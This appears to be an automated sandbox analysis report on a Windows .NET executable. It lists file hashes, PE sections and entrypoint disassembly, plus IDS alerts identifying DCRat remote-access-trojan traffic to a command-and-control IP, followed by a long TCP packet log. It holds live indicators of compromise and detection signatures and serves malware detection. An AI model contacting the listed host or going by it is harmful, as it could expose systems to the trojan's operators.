Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 14/12/2024 20:20:59..20:20:59, error: 0x80072746.20:21:04, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.5830243113664135
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	LaRHzSijsq.exe
File size:	19'968 bytes
MD5:	74f1fcf96c9e31f50f6d83072ec68d07
SHA1:	f05ada88e038fef51b6f0840084cd0f155faaa0e
SHA256:	4944035addbf7b1db7cf58fca9cda3050fbf87c3b5ca18dc124ceae5767a8bea
SHA512:	2816798078e430930c77c7d992924a07159dea089d1462bc17833b197545af5eebbaecca23869b1b880128bf82c4a0ab815c490c7a08ca6ed7e48099ef479074
SSDEEP:	384:uJMu1ZUZebwYr/lfbX6b+f9daNutwoLmdKkd/rwmW:E11Zzb1bQ+fXaNOST/rU
TLSH:	DE925C12A3C48B14D9B97B7E88FBA200136DF7D797B2C79D9FA4420A6C07275153A349
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....M..........."...0..<...............@... ....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a00a
Entrypoint Section:	<gfAAjIM
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBE4DBCEE [Thu Mar 5 07:21:18 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0040A000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4988	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x596	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x8	<gfAAjIM
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x4000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
cz}rRa^	0x2000	0x4a8	0x600	5bcab3a56ad158112271789d6d556faf	False	1.0071614583333333	data	7.890339146660966	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x4000	0x396d	0x3a00	76907493eb3b5cf1eec17fbbd999e115	False	0.7592268318965517	data	7.062227534981493	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x596	0x600	5cedfe3c17a15f17bd54e405afbdc7ed	False	0.4153645833333333	data	4.0593623679321	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
<gfAAjIM	0xa000	0x10	0x200	3184ee6084a2708df2b083ef2e05cdd8	False	0.04296875	data	0.12227588125913882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xc	0x200	a79b7bf113d666f6b3d83e333f40e681	False	0.041015625	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x30c	data			0.43205128205128207
RT_MANIFEST	0x83ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-15T00:22:27.113354+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.4	49735	92.53.106.114	80	TCP
2024-12-15T00:22:44.751641+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	92.53.106.114	80	192.168.2.4	49741	TCP
2024-12-15T00:23:45.557482+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	92.53.106.114	80	192.168.2.4	49842	TCP
2024-12-15T00:24:50.591728+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	92.53.106.114	80	192.168.2.4	50002	TCP
2024-12-15T00:25:53.944784+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	92.53.106.114	80	192.168.2.4	49986	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:22:02.343395948 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:02.343487024 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:02.343580961 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:02.358938932 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:02.359019041 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:03.588728905 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:03.589361906 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:03.599509954 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:03.599570036 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:03.600626945 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:03.655999899 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:03.823916912 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:03.871373892 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.156137943 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.156337023 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.156390905 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.156408072 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.156435013 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.156486988 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.157171965 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.164417028 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.164484024 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.164499998 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.173038960 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.173099995 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.173108101 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.181524038 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.181596041 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.181602955 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.232697010 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.279709101 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.326447964 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.326457024 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.373307943 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.800652027 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.800806999 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.800874949 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.800910950 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.801081896 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.801151037 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.801161051 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.802018881 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.802100897 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.802103996 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.802131891 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.802181959 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.802906036 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.803062916 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.803123951 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.803131104 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806775093 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806794882 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806828976 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806871891 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806895971 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806927919 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.806927919 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.806927919 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.806962013 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.806988001 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.807004929 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.807017088 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.857695103 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.950517893 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.950551987 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.950691938 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.950691938 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.950743914 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.950793028 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.950835943 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.950858116 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.950858116 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.951121092 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.998541117 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.998605967 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.998789072 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.998789072 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:04.998821020 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:04.999013901 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.072539091 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.072608948 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.072742939 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.072742939 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.072773933 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.072995901 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.120510101 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.120578051 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.120655060 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.120656013 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.120685101 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.120740891 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.180299997 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.180366039 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.180419922 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.180450916 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.180478096 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.180543900 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.213762045 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.213830948 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.213860035 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.213891983 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.213917017 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.213946104 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.233700037 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.233735085 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.233860016 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.233860016 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.233891964 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.233958006 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.255466938 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.255534887 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.255673885 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.255673885 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.255738020 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.255826950 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.275801897 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.275871038 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.275994062 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.275994062 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.276057005 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.276154041 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.297440052 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.297509909 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.297642946 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.297642946 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.297705889 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.297789097 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.325817108 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.325881004 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.325994968 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.325994968 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.326025009 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.326086044 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.340369940 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.340404034 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.340449095 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.340482950 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.340502977 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.340523005 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.356663942 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.356731892 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.356870890 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.356870890 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.356904984 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.356961966 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.370794058 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.370839119 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.370940924 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.370940924 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.370973110 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.371176958 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.383455992 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.383500099 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.383528948 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.383563042 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.383582115 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.383841991 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.394157887 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.394203901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.394329071 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.394329071 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.394361019 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.394416094 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.404611111 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.404650927 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.404865026 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.404865980 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.404896975 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.404962063 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.413170099 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.413213968 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.413253069 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.413286924 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.413309097 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.413340092 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.422272921 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.422313929 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.422436953 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.422436953 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.422468901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.422527075 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.430478096 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.430495977 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.430630922 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.430630922 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.430663109 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.430926085 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.438841105 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.438862085 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.438904047 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.438935041 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.438957930 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.438978910 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.448391914 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.448411942 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.448560953 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.448560953 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.448592901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.448671103 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.455286980 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.455358982 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.455382109 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.455415964 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.455434084 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.455456972 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.460108042 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.460191965 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.460335970 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.460369110 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.460592985 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.469536066 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.469580889 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.469639063 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.469639063 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.469670057 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.469708920 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.476279974 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.476321936 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.476377964 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.476411104 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.476438046 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.476453066 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.483371973 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.483412027 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.483561039 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.483561039 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.483592987 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.483648062 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.490130901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.490170956 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.490314007 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.490314007 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.490345955 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.490394115 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.497004986 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.497044086 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.497092009 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.497092009 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.497138023 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.497415066 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.503789902 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.503828049 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.503878117 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.503911018 CET	443	49730	185.199.109.133	192.168.2.4
